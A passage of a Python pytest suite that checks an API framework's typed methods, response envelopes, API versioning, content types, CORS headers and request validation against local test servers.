assert response.result["data"] is None
assert "metadata" in response.result
assert "warnings" in response.result["metadata"]
assert "error1" in response.result["metadata"]["warnings"]
@pytest.mark.asyncio
async def test_invalid_handler():
"""
Handlers should be async
"""
with pytest.raises(ValueError):
class ProjectServer(ServerSlice):
@protocol.method(path="/test", operation="POST", client_types=["api"])
def test_method(self):
"""
Create a new project
"""
@protocol.handle(test_method)
def test_method(self):
return
@pytest.mark.asyncio
async def test_return_value(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test the use and validation of methods that use common.ReturnValue
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
id: uuid.UUID
name: str
class ProjectServer(ServerSlice):
@protocol.method(path="/test", operation="POST", client_types=["api"])
def test_method(project: Project) -> ReturnValue[Project]: # NOQA
"""
Create a new project
"""
@protocol.handle(test_method)
async def test_method(self, project: Project) -> ReturnValue[Project]:
new_project = project.copy()
return ReturnValue(response=new_project)
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "id" in result.result
assert "name" in result.result
@pytest.mark.asyncio
async def test_return_model(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test the use and validation of methods that use common.ReturnValue
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
id: uuid.UUID
name: str
class ProjectServer(ServerSlice):
@protocol.method(path="/test", operation="POST", client_types=["api"])
def test_method(project: Project) -> Project: # NOQA
"""
Create a new project
"""
@protocol.method(path="/test2", operation="POST", client_types=["api"])
def test_method2(project: Project) -> None: # NOQA
pass
@protocol.method(path="/test3", operation="POST", client_types=["api"])
def test_method3(project: Project) -> None: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, project: Project) -> Project:
new_project = project.copy()
return new_project
@protocol.handle(test_method2)
async def test_method2(self, project: Project) -> None:
pass
@protocol.handle(test_method3)
async def test_method3(self, project: Project) -> None:
return 1
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "id" in result.result
assert "name" in result.result
result = await client.test_method2({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
result = await client.test_method3({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 500
@pytest.mark.asyncio
async def test_data_envelope(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test the use and validation of methods that use common.ReturnValue
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
id: uuid.UUID
name: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(project: Project) -> ReturnValue[Project]: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, project: Project) -> ReturnValue[Project]:
new_project = project.copy()
return ReturnValue(response=new_project)
@protocol.typedmethod(path="/test2", operation="POST", client_types=["api"], envelope_key="method")
def test_method2(project: Project) -> ReturnValue[Project]: # NOQA
pass
@protocol.handle(test_method2)
async def test_method2(self, project: Project) -> ReturnValue[Project]:
new_project = project.copy()
return ReturnValue(response=new_project)
@protocol.method(path="/test3", operation="POST", client_types=["api"], envelope=True)
def test_method3(project: Project): # NOQA
pass
@protocol.handle(test_method3)
async def test_method3(self, project: dict) -> Apireturn:
return 200, {"id": 1, "name": 2}
@protocol.method(path="/test4", operation="POST", client_types=["api"], envelope=True, envelope_key="project")
def test_method4(project: Project): # NOQA
pass
@protocol.handle(test_method4)
async def test_method4(self, project: dict) -> Apireturn:
return 200, {"id": 1, "name": 2}
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
# 1
result = await client.test_method({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "data" in result.result
assert "id" in result.result["data"]
assert "name" in result.result["data"]
# 2
result = await client.test_method2({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "method" in result.result
assert "id" in result.result["method"]
assert "name" in result.result["method"]
# 3
result = await client.test_method3({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "data" in result.result
assert "id" in result.result["data"]
assert "name" in result.result["data"]
# 4
result = await client.test_method4({"name": "test", "id": str(uuid.uuid4())})
assert result.code == 200
assert "project" in result.result
assert "id" in result.result["project"]
assert "name" in result.result["project"]
@pytest.mark.asyncio
async def test_invalid_paths():
"""
Test path validation
"""
with pytest.raises(InvalidPathException) as e:
@protocol.method(path="test", operation="PUT", client_types=["api"], api_prefix="x", api_version=2)
def test_method(name):
pass
assert "test should start with a /" == str(e.value)
with pytest.raises(InvalidPathException) as e:
@protocol.method(path="/test/<othername>", operation="PUT", client_types=["api"], api_prefix="x", api_version=2)
def test_method2(name):
pass
assert str(e.value).startswith("Variable othername in path /test/<othername> is not defined in function")
@pytest.mark.asyncio
async def test_nested_paths(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test overlapping path definition"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<data>", operation="GET", client_types=["api"])
def test_method(data: str) -> Project: # NOQA
pass
@protocol.typedmethod(path="/test/<data>/config", operation="GET", client_types=["api"])
def test_method2(data: str) -> Project: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: str) -> Project:
# verify that URL encoded data is properly decoded
assert "%20" not in data
return Project(name="test_method")
@protocol.handle(test_method2)
async def test_method2(self, data: str) -> Project:
return Project(name="test_method2")
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method({"data": "test "})
assert result.code == 200
assert "test_method" == result.result["data"]["name"]
client = protocol.Client("client")
result = await client.test_method2({"data": "test"})
assert result.code == 200
assert "test_method2" == result.result["data"]["name"]
@pytest.mark.asyncio
async def test_list_basemodel_argument(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test list of basemodel arguments and primitive types"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(data: List[Project], data2: List[int]) -> Project: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: List[Project], data2: List[int]) -> Project:
assert len(data) == 1
assert data[0].name == "test"
assert len(data2) == 3
return Project(name="test_method")
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method(data=[{"name": "test"}], data2=[1, 2, 3])
assert result.code == 200
assert "test_method" == result.result["data"]["name"]
@pytest.mark.asyncio
async def test_dict_basemodel_argument(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test dict of basemodel arguments and primitive types"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(data: Dict[str, Project], data2: Dict[str, int]) -> Project: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: Dict[str, Project], data2: Dict[str, int]) -> Project:
assert len(data) == 1
assert data["projectA"].name == "test"
assert len(data2) == 3
return Project(name="test_method")
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method(data={"projectA": {"name": "test"}}, data2={"1": 1, "2": 2, "3": 3})
assert result.code == 200
assert "test_method" == result.result["data"]["name"]
@pytest.mark.asyncio
async def test_dict_with_optional_values(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test dict which may have None as a value"""
configure(unused_tcp_port, database_name, postgres_db.port)
types = Union[pydantic.StrictInt, pydantic.StrictStr]
class Result(BaseModel):
val: Optional[types]
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(data: Dict[str, Optional[types]]) -> Result: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: Dict[str, Optional[types]]) -> Result:
assert len(data) == 1
assert "test" in data
return Result(val=data["test"])
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method2(data: Optional[str] = None) -> None: # NOQA
pass
@protocol.handle(test_method2)
async def test_method2(self, data: Optional[str] = None) -> None:
assert data is None
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method(data={"test": None})
assert result.code == 200
assert result.result["data"]["val"] is None
result = await client.test_method(data={"test": 5})
assert result.code == 200
assert result.result["data"]["val"] == 5
result = await client.test_method(data={"test": "test123"})
assert result.code == 200
assert result.result["data"]["val"] == "test123"
result = await client.test_method2()
assert result.code == 200
result = await client.test_method2(data=None)
assert result.code == 200
@pytest.mark.asyncio
async def test_dict_and_list_return(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test list of basemodel arguments"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(data: Project) -> List[Project]: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: Project) -> List[Project]: # NOQA
return [Project(name="test_method")]
@protocol.typedmethod(path="/test2", operation="POST", client_types=["api"])
def test_method2(data: Project) -> List[str]: # NOQA
pass
@protocol.handle(test_method2)
async def test_method2(self, data: Project) -> List[str]: # NOQA
return ["test_method"]
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_method(data={"name": "test"})
assert result.code == 200
assert len(result.result["data"]) == 1
assert "test_method" == result.result["data"][0]["name"]
result = await client.test_method2(data={"name": "test"})
assert result.code == 200
assert len(result.result["data"]) == 1
assert "test_method" == result.result["data"][0]
@pytest.mark.asyncio
async def test_method_definition():
"""
Test typed methods with wrong annotations
"""
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.typedmethod(path="/test", operation="PUT", client_types=["api"])
def test_method1(name) -> None:
"""
Create a new project
"""
assert "has no type annotation." in str(e.value)
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.typedmethod(path="/test", operation="PUT", client_types=["api"])
def test_method2(name: Iterator[str]) -> None:
"""
Create a new project
"""
assert "Type typing.Iterator[str] of argument name can only be generic List or Dict" in str(e.value)
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.typedmethod(path="/test", operation="PUT", client_types=["api"])
def test_method3(name: List[object]) -> None:
"""
Create a new project
"""
assert (
"Type object of argument name must be a either BaseModel, Enum, UUID, str, float, int, StrictNonIntBool, datetime, "
"bytes or a List of these types or a Dict with str keys and values of these types."
) in str(e.value)
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.typedmethod(path="/test", operation="PUT", client_types=["api"])
def test_method4(name: Dict[int, str]) -> None:
"""
Create a new project
"""
assert "Type typing.Dict[int, str] of argument name must be a Dict with str keys and not int" in str(e.value)
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.typedmethod(path="/test", operation="PUT", client_types=["api"])
def test_method5(name: Dict[str, object]) -> None:
"""
Create a new project
"""
assert (
"Type object of argument name must be a either BaseModel, Enum, UUID, str, float, int, StrictNonIntBool, datetime, "
"bytes or a List of these types or a Dict with str keys and values of these types."
) in str(e.value)
@protocol.typedmethod(path="/service_types/<service_type>", operation="DELETE", client_types=["api"])
def lcm_service_type_delete(tid: uuid.UUID, service_type: str) -> None:
"""Delete an existing service type."""
def test_optional():
@protocol.typedmethod(path="/service_types/<service_type>", operation="DELETE", client_types=["api"])
def lcm_service_type_delete(tid: uuid.UUID, service_type: str, version: Optional[str] = None) -> None:
"""Delete an existing service type."""
@pytest.mark.asyncio
async def test_union_types(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test use of union types"""
configure(unused_tcp_port, database_name, postgres_db.port)
SimpleTypes = Union[float, int, StrictBool, str] # NOQA
AttributeTypes = Union[SimpleTypes, List[SimpleTypes], Dict[str, SimpleTypes]] # NOQA
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method(data: SimpleTypes, version: Optional[int] = None) -> List[SimpleTypes]: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: SimpleTypes, version: Optional[int] = None) -> List[SimpleTypes]: # NOQA
if isinstance(data, list):
return data
return [data]
@protocol.typedmethod(path="/testp", operation="POST", client_types=["api"])
def test_methodp(data: AttributeTypes, version: Optional[int] = None) -> List[SimpleTypes]: # NOQA
pass
@protocol.handle(test_methodp)
async def test_methodp(self, data: AttributeTypes, version: Optional[int] = None) -> List[SimpleTypes]: # NOQA
if isinstance(data, list):
return data
return [data]
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
result = await client.test_methodp(data=[5], version=7)
assert result.code == 200
assert len(result.result["data"]) == 1
assert 5 == result.result["data"][0]
result = await client.test_method(data=5, version=3)
assert result.code == 200
assert len(result.result["data"]) == 1
assert 5 == result.result["data"][0]
result = await client.test_method(data=5)
assert result.code == 200
assert len(result.result["data"]) == 1
assert 5 == result.result["data"][0]
result = await client.test_method(data=5, version=7)
assert result.code == 200
assert len(result.result["data"]) == 1
assert 5 == result.result["data"][0]
@pytest.mark.asyncio
async def test_basemodel_validation(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test validation of basemodel arguments and return, and how they are reported"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
value: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(data: Project) -> Project: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, data: Project) -> Project: # NOQA
return Project()
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
# Check validation of arguments
result = await client.test_method(data={})
assert result.code == 400
assert "error_details" in result.result
details = result.result["error_details"]["validation_errors"]
assert len(details) == 2
name = [d for d in details if d["loc"] == ["data", "name"]][0]
value = [d for d in details if d["loc"] == ["data", "value"]][0]
assert name["msg"] == "field required"
assert value["msg"] == "field required"
# Check the validation of the return value
result = await client.test_method(data={"name": "X", "value": "Y"})
assert result.code == 500
assert "data validation error" in result.result["message"]
@pytest.mark.asyncio
async def test_ACOA_header(server):
"""
Test if the server accepts gzipped encoding and returns gzipped encoding.
"""
port = opt.get_bind_port()
url = f"http://localhost:{port}/api/v1/environment"
request = HTTPRequest(url=url, method="GET")
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
assert response.headers.get("Access-Control-Allow-Origin") is None
config.Config.set("server", "access-control-allow-origin", "*")
response = await client.fetch(request)
assert response.code == 200
assert response.headers.get("Access-Control-Allow-Origin") == "*"
@pytest.mark.asyncio
async def test_multi_version_method(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test multi version methods"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
value: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test2", operation="POST", client_types=["api"], api_version=3)
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"], api_version=2, envelope_key="data")
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"], api_version=1, envelope_key="project")
def test_method(project: Project) -> Project: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, project: Project) -> Project: # NOQA
return project
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# rest call
port = opt.get_bind_port()
request = HTTPRequest(
url=f"http://localhost:{port}/api/v1/test", method="POST", body=json_encode({"project": {"name": "a", "value": "b"}})
)
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
body = json.loads(response.body)
assert "project" in body
request = HTTPRequest(
url=f"http://localhost:{port}/api/v2/test", method="POST", body=json_encode({"project": {"name": "a", "value": "b"}})
)
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
body = json.loads(response.body)
assert "data" in body
request = HTTPRequest(
url=f"http://localhost:{port}/api/v3/test2", method="POST", body=json_encode({"project": {"name": "a", "value": "b"}})
)
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
body = json.loads(response.body)
assert "data" in body
# client based calls
client = protocol.Client("client")
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "project" in response.result
client = protocol.Client("client", version_match=VersionMatch.highest)
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "data" in response.result
client = protocol.Client("client", version_match=VersionMatch.exact, exact_version=1)
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "project" in response.result
client = protocol.Client("client", version_match=VersionMatch.exact, exact_version=2)
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "data" in response.result
@pytest.mark.asyncio
async def test_multi_version_handler(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test multi version methods"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
value: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"], api_version=2, envelope_key="data")
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"], api_version=1, envelope_key="project")
def test_method(project: Project) -> Project: # NOQA
pass
@protocol.handle(test_method, api_version=1)
async def test_methodX(self, project: Project) -> Project: # NOQA
return Project(name="v1", value="1")
@protocol.handle(test_method, api_version=2)
async def test_methodY(self, project: Project) -> Project: # NOQA
return Project(name="v2", value="2")
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "project" in response.result
assert response.result["project"]["name"] == "v1"
client = protocol.Client("client", version_match=VersionMatch.highest)
response = await client.test_method(project=Project(name="a", value="b"))
assert response.code == 200
assert "data" in response.result
assert response.result["data"]["name"] == "v2"
@pytest.mark.asyncio
async def test_simple_return_type(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test methods with simple return types"""
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(project: str) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_methodY(self, project: str) -> str: # NOQA
return project
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method(project="x")
assert response.code == 200
assert response.result["data"] == "x"
@pytest.mark.asyncio
async def test_html_content_type(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test whether API endpoints with a text/html content-type work."""
configure(unused_tcp_port, database_name, postgres_db.port)
html_content = "<html><body>test</body></html>"
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method() -> ReturnValue[str]: # NOQA
pass
class TestServer(ServerSlice):
@protocol.handle(test_method)
async def test_methodY(self) -> ReturnValue[str]: # NOQA
return ReturnValue(response=html_content, content_type=HTML_CONTENT)
rs = Server()
server = TestServer(name="testserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method()
assert response.code == 200
assert response.result == html_content
@pytest.mark.asyncio
async def test_html_content_type_with_utf8_encoding(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test whether API endpoints with a "text/html; charset=UTF-8" content-type work."""
configure(unused_tcp_port, database_name, postgres_db.port)
html_content = "<html><body>test</body></html>"
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method() -> ReturnValue[str]: # NOQA
pass
class TestServer(ServerSlice):
@protocol.handle(test_method)
async def test_methodY(self) -> ReturnValue[str]: # NOQA
return ReturnValue(response=html_content, content_type=HTML_CONTENT_WITH_UTF8_CHARSET)
rs = Server()
server = TestServer(name="testserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method()
assert response.code == 200
assert response.result == html_content
@pytest.mark.asyncio
async def test_octet_stream_content_type(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test whether API endpoints with an application/octet-stream content-type work."""
configure(unused_tcp_port, database_name, postgres_db.port)
byte_stream = b"test123"
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method() -> ReturnValue[bytes]: # NOQA
pass
class TestServer(ServerSlice):
@protocol.handle(test_method)
async def test_methodY(self) -> ReturnValue[bytes]: # NOQA
return ReturnValue(response=byte_stream, content_type=OCTET_STREAM_CONTENT)
rs = Server()
server = TestServer(name="testserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method()
assert response.code == 200
assert response.result == byte_stream
@pytest.mark.asyncio
async def test_zip_content_type(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""Test whether API endpoints with an application/zip content-type work."""
configure(unused_tcp_port, database_name, postgres_db.port)
zip_content = b"test123"
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method() -> ReturnValue[bytes]: # NOQA
pass
class TestServer(ServerSlice):
@protocol.handle(test_method)
async def test_methodY(self) -> ReturnValue[bytes]: # NOQA
return ReturnValue(response=zip_content, content_type=ZIP_CONTENT)
rs = Server()
server = TestServer(name="testserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
# client based calls
client = protocol.Client("client")
response = await client.test_method()
assert response.code == 200
assert response.result == zip_content
@pytest.fixture
async def options_server():
@protocol.typedmethod(path="/test", operation="OPTIONS", client_types=["api"])
def test_method() -> ReturnValue[str]: # NOQA
pass
class TestServer(ServerSlice):
@protocol.handle(test_method)
async def test_methodY(self) -> ReturnValue[str]: # NOQA
return ReturnValue(response="content")
return TestServer(name="testserver")
@pytest.fixture
def options_request(unused_tcp_port):
return HTTPRequest(
url=f"http://localhost:{unused_tcp_port}/api/v1/test",
method="OPTIONS",
connect_timeout=1.0,
request_timeout=1.0,
decompress_response=True,
)
@pytest.mark.asyncio
@pytest.mark.parametrize("auth_enabled, auth_header_allowed", [(True, True), (False, False)])
async def test_auth_enabled_options_method(
auth_enabled,
auth_header_allowed,
unused_tcp_port,
postgres_db,
database_name,
async_finalizer,
options_server,
options_request,
):
configure(unused_tcp_port, database_name, postgres_db.port)
config.Config.set("server", "auth", str(auth_enabled))
rs = Server()
rs.add_slice(options_server)
await rs.start()
async_finalizer.add(options_server.stop)
async_finalizer.add(rs.stop)
client = AsyncHTTPClient()
response = await client.fetch(options_request)
assert response.code == 200
assert ("Authorization" in response.headers.get("Access-Control-Allow-Headers")) == auth_header_allowed
@pytest.mark.asyncio
async def test_required_header_not_present(server):
client = AsyncHTTPClient()
response = await client.fetch(f"http://localhost:{server_bind_port.get()}/api/v2/environment_settings", raise_error=False)
assert response.code == 400
@pytest.mark.asyncio
async def test_malformed_json(server):
"""
Tests sending malformed json to the server
"""
port = opt.get_bind_port()
url = f"http://localhost:{port}/api/v2/environment"
request = HTTPRequest(url=url, method="PUT", body='{"name": env}')
client = AsyncHTTPClient()
response = await client.fetch(request, raise_error=False)
assert response.code == 400
assert (
json.loads(response.body)["message"]
== "The request body couldn't be decoded as a JSON: Expecting value: line 1 column 10 (char 9)"
)
@pytest.mark.asyncio
async def test_tuple_index_out_of_range(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
name: str
value: str
class ProjectServer(ServerSlice):
@protocol.typedmethod(
api_prefix="test", path="/project/<project>", operation="GET", arg_options=ENV_OPTS, client_types=["api"]
)
def test_method(
tid: uuid.UUID, project: str, include_deleted: bool = False
) -> List[Union[uuid.UUID, Project, bool]]: # NOQA
pass
@protocol.handle(test_method)
async def test_method(
tid: uuid.UUID, project: Project, include_deleted: bool = False
) -> List[Union[uuid.UUID, Project, bool]]: # NOQA
return [tid, project, include_deleted]
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
port = opt.get_bind_port()
url = f"http://localhost:{port}/test/v1/project/afcb51dc-1043-42b6-bb99-b4fc88603126"
request = HTTPRequest(url=url, method="GET")
client = AsyncHTTPClient()
response = await client.fetch(request, raise_error=False)
assert response.code == 400
assert json.loads(response.body)["message"] == "Invalid request: Field 'tid' is required."
@pytest.mark.asyncio
async def test_multiple_path_params(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, age: int) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_methodY(self, id: str, name: str, age: int) -> str: # NOQA
return name
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(args=[], kwargs={"id": "1", "name": "monty", "age": 42})
assert request.url == "/api/v1/test/1/monty?age=42"
@pytest.mark.asyncio(timeout=5)
async def test_2151_method_header_parameter_in_body(async_finalizer) -> None:
async def _id(x: object, dct: Dict[str, str]) -> object:
return x
@protocol.method(
path="/testmethod",
operation="POST",
arg_options={"header_param": ArgOption(header="X-Inmanta-Header-Param", getter=_id)},
client_types=[const.ClientType.api],
)
def test_method(header_param: str, body_param: str) -> None:
"""
A method used for testing.
"""
class TestSlice(ServerSlice):
@protocol.handle(test_method)
async def test_method_implementation(self, header_param: str, body_param: str) -> None:
pass
server: Server = Server()
server_slice: ServerSlice = TestSlice("my_test_slice")
server.add_slice(server_slice)
await server.start()
async_finalizer.add(server_slice.stop)
async_finalizer.add(server.stop)
client = tornado.httpclient.AsyncHTTPClient()
# valid request should succeed
request = tornado.httpclient.HTTPRequest(
url=f"http://localhost:{opt.get_bind_port()}/api/v1/testmethod",
method="POST",
body=json_encode({"body_param": "body_param_value"}),
headers={"X-Inmanta-Header-Param": "header_param_value"},
)
response: tornado.httpclient.HTTPResponse = await client.fetch(request)
assert response.code == 200
# invalid request should fail
request = tornado.httpclient.HTTPRequest(
url=f"http://localhost:{opt.get_bind_port()}/api/v1/testmethod",
method="POST",
body=json_encode({"header_param": "header_param_value", "body_param": "body_param_value"}),
)
with pytest.raises(tornado.httpclient.HTTPClientError):
await client.fetch(request)
@pytest.mark.parametrize("return_value,valid", [(1, True), (None, True), ("Hello World!", False)])
@pytest.mark.asyncio
async def test_2277_typedmethod_return_optional(async_finalizer, return_value: object, valid: bool) -> None:
@protocol.typedmethod(
path="/typedtestmethod",
operation="GET",
client_types=[const.ClientType.api],
api_version=1,
)
def test_method_typed() -> Optional[int]:
"""
A typedmethod used for testing.
"""
class TestSlice(ServerSlice):
@protocol.handle(test_method_typed)
async def test_method_typed_implementation(self) -> Optional[int]:
return return_value # type: ignore
server: Server = Server()
server_slice: ServerSlice = TestSlice("my_test_slice")
server.add_slice(server_slice)
await server.start()
async_finalizer.add(server_slice.stop)
async_finalizer.add(server.stop)
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method_typed()
if valid:
assert response.code == 200
assert response.result == {"data": return_value}
else:
assert response.code == 400
def test_method_strict_exception() -> None:
with pytest.raises(InvalidMethodDefinition, match="Invalid type for argument arg: Any type is not allowed in strict mode"):
@protocol.typedmethod(path="/testmethod", operation="POST", client_types=[const.ClientType.api])
def test_method(arg: Any) -> None:
pass
@pytest.mark.asyncio
async def test_method_nonstrict_allowed(async_finalizer) -> None:
@protocol.typedmethod(path="/zipsingle", operation="POST", client_types=[const.ClientType.api], strict_typing=False)
def merge_dicts(one: Dict[str, Any], other: Dict[str, int], any_arg: Any) -> Dict[str, Any]:
"""
Merge two dicts.
"""
class TestSlice(ServerSlice):
@protocol.handle(merge_dicts)
async def merge_dicts_impl(self, one: Dict[str, Any], other: Dict[str, int], any_arg: Any) -> Dict[str, Any]:
return {**one, **other}
server: Server = Server()
server_slice: ServerSlice = TestSlice("my_test_slice")
server.add_slice(server_slice)
await server.start()
async_finalizer.add(server_slice.stop)
async_finalizer.add(server.stop)
client: protocol.Client = protocol.Client("client")
one: Dict[str, Any] = {"my": {"nested": {"keys": 42}}}
other: Dict[str, int] = {"single_level": 42}
response: Result = await client.merge_dicts(one, other, None)
assert response.code == 200
assert response.result == {"data": {**one, **other}}
@pytest.mark.parametrize(
"param_type,param_value,expected_url",
[
(
Dict[str, str],
{"a": "b", "c": "d", ",&?=%": ",&?=%."},
"/api/v1/test/1/monty?filter.a=b&filter.c=d&filter.%2C%26%3F%3D%25=%2C%26%3F%3D%25.",
),
(
Dict[str, List[str]],
{"a": ["b"], "c": ["d", "e"], "g": ["h"]},
